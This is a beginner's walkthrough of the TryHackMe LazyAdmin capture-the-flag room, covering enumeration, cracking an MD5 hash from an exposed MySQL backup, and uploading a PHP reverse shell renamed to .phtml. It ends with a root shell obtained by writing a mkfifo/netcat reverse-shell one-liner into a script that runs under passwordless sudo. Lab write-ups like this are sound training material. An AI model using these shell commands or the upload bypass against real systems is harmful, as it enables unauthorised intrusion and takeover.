TryHackMe — LazyAdmin Write Up
A little transparency here, I had to get some small hints from another write up to be able to complete this room. But I only went to it when I was really stuck, and they were really just to get me on the right track, I figured it out from there. I will be sure to note when I looked at a write up in my own write up.
This is the first write-up I have done for a lab/CTF but I am excited to jump in. I figured it would be best to start out with a beginner level CTF and I love the CTFs that https://tryhackme.com/ has. Let me know if you have any feedback after going through this if you follow along with it!
Step 1: Enumeration
First lets start with an nmap scan on our victim IP address.
I used sudo nmap -sS -sV -A -O -p 1–30000 10.10.52.60 [I generally use -p- on my scan but it was going to take a little longer than expected so I figured since this was beginner level CTF, it would be unlikely that there is a service running on a port higher than 30000]
After doing our scan, we see that there’s two services listening on this machine. On port tcp/22 [SSH] and port tcp/80 [HTTP].
Being that we don’t have much information to go on for the SSH connection, lets look at the website on port 80. Go to your web browser and type in your victim IP which is 10.10.52.60 for me.
Looks like it’s just a default Apache page, so not much to go on yet. If we explore this page and look at the source HTML code we don’t really get much either.
The next step would be to do some directory fuzzing of this webpage and see if we find anything interesting. I like to use dirbuster because of its user interface. You can also just use dirb http://VICTIMIP in the command line.
Pull up dirbuster and then type in the URL of your victim machine. And then tell it to go faster by using more threads on your CPU. And then tell it to use the common.txt directory list that is under /usr/share/wordlists/dirb/common.txt
This scan gives us some interesting directories to explore on this webpage.
The first one that seems like we might have the use for is /content/as/ if we go to that page it’s a login page using a service called SweetRice!
The first thing I did was look at the source HTML code of this page but I struggled to find anything. I also tried a brute forcing of this login page with Burp Suite using admin as the user but that didn’t get me any results. I then when back to the results I got from the dirbuster scan of the directories and found another one that was interesting. That one was content/inc/
This gives us a lot of files. The most interesting folder on here though is mysql_backup/ maybe it could have some usernames or passwords?
If we go to this directory, we find a MySQL backup file that we can download and open up on our own machine. I used Mousepad to open it and searched through its contents. Up the search I found this string of numbers that I thought must have been a password hash.
At this point I looked at a write up because I couldn’t figure out if this was actually what I needed to be looking at. It turns out it was but it’s an MD5 hash. I was trying to decode with Base64 (looks like I don’t know hashes enough to discern their types just by looking at them haha.)
Once I figured out it was MD5 I stepped away from that write up and went back to my own ways. If you plug the hash into an MD5 cracker like https://crackstation.net/ it’ll give you a password!
Step 2: Getting Access
Once I had a password I went back to that SweetRice! login page at /content/as and tried the user as admin and then the password I got. It didn’t work so I went back to the MySQL backup file and noticed there was a listing of manager which I thought maybe was the login user instead. And sure enough it worked!
Now lets see what we can do to get access to this machine. The first thing I can think of is getting a reverse shell somehow. I did some clicking around & searching and found that the Media Center lets you upload files to the page that you can navigate to. This means we can get a reverse shell from here!
What I’m going to try first is using a PHP reverse shell. You can download the code for that from https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
You just need to make sure you tweak some values inside the file before you upload it. Those are:
$ip = ‘127.0.0.1’;
$port = 1234;
Set the IP to your attacking machine’s IP address and the port that you want to listen on. I usually just do 4444 for my listening port for a reverse shell. We can then do nc -lvp 4444 in the command line to start listening on that port.
Once you tweak those values then you can try and upload it to that Media Center page. When I did it at first it didn’t work. Hmm… it must be blacklisting the .php files. So the other option is try change the extension to something different. Lets try .phtml instead and see if that works. It’ll still maintain our PHP reverse shell if it does. Sure enough it does!
Again, just make sure you’re listening on port 4444 with nc -lvp 4444 and then click on the file in Media Center to navigate to it. And sure enough we get a reverse shell!
This shell looks a little unstable so lets make it more stable with python3 -c ‘import pty; pty.spawn(“/bin/bash”)’ [Learned this from the Complete Beginner Learning path on TryHackMe & the eJPT material on INE]. We can then see where we are with ls -al and navigate from there. Eventually you can find the home folder and navigate to /home/itguy and this is where our first flag user.txt is!
Open that guy with cat and plug the value it into TryHackMe!
Step 3: Privilege Escalation
Now that we have access to the machine and we’ve gotten our user flag, we need to get root privileges to get our root.txt flag!
I first tried looking at the SUID binary files with find / -perm -u=s -type f 2>/dev/null and looked on GTFO Bins to see if any of them were on there for SUID but there wasn’t anything unfortunately.
The next thing I tried was sudo -l which lets you see if there’s any files that can be run with sudo permissions without a sudo password. And sure enough it gives us something to look into.
This is interesting (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
The first thing I decided to do was go and open up backup.pl with cat and we get this.
So the first things to know is that .pl is a perl file. I had to look this up because I haven’t become familiar with perl files yet, mainly just python ones (.py) so far. But basically this is a perl file that executes a copy.sh file in /etc/ so lets go look at this file.
Okay, this is interesting. We get rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
I honestly wasn’t quite sure what this was yet. I knew this was a lead and this had to get us root access somehow but I didn’t know how. I did some more poking around and even tried to get linpeas.sh on the machine by running a python HTTP server on my attack machine but the permissions on the victim machine wouldn’t let me get it on there. I reached a point where I was stuck so I decided to take a peak at the same write up I did early to get some hints.
What I discovered was that the command in copy.sh was another reverse shell that we could execute. And since this is executed from a file (backup.pl) that can be executed with sudo permissions without a password, that means we can get it run as root and get a root reverse shell.
We first need to change the IP address in that command to our own attacker machine. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.71.50 5554 >/tmp/f now that it’s changed, we can stay in our /etc/ directory and input this command into the copy.sh with echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.6.71.50 5554 >/tmp/f” > copy.sh [The quotes are important here in order for echo to read the command correctly and input it into copy.sh]
Now we can go back to /home/itguy and execute the backup.pl file with sudo.
A note here, you have to type in sudo /usr/bin/perl /home/itguy/backup.pl and not just sudo perl backup.pl in order for it to work correctly. I learned this with many failed attempts of it asking me for the sudo password again and again haha.
Make sure that you have a separate command line window open with nc -lvp 5554 to get the reverse shell. Then we can run sudo /usr/bin/perl /home/itguy/backup.pl and sure enough we get our reverse shell as root!
Now we can navigate to our root folder with cd /root and get your root.txt flag!
And that’s the end of this lab! Thank you for those of you who have read through this!
If you have any feedback to give or would just like to reach out in general you can contact me at tjackson.video@gmail.com
Thank you!